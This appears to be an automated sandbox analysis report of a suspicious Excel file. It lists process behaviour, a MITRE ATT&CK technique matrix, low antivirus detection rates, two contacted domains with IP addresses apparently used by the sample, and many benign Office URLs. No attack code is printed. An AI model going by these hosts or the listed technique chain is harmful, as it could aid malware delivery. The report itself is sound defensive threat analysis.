Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 00000005.00000002.684650362.0000000001040000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000005.00000002.684650362.0000000001040000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000005.00000002.684650362.0000000001040000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000005.00000002.684650362.0000000001040000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
54402971_by_Libranalysis.xls7%VirustotalBrowse
54402971_by_Libranalysis.xls11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com0%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
    high
    https://login.microsoftonline.com/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
      high
      https://shell.suite.office.com:1443221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
          high
          https://autodiscover-s.outlook.com/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
              high
              https://cdn.entity.221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                    high
                    https://powerlift.acompli.net221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                      high
                      https://cortana.ai221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                high
                                https://api.aadrm.com/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                      high
                                      https://cr.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                            high
                                            https://graph.ppe.windows.net221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                            high
                                                            https://graph.windows.net221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                high
                                                                                                https://api.office.net221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
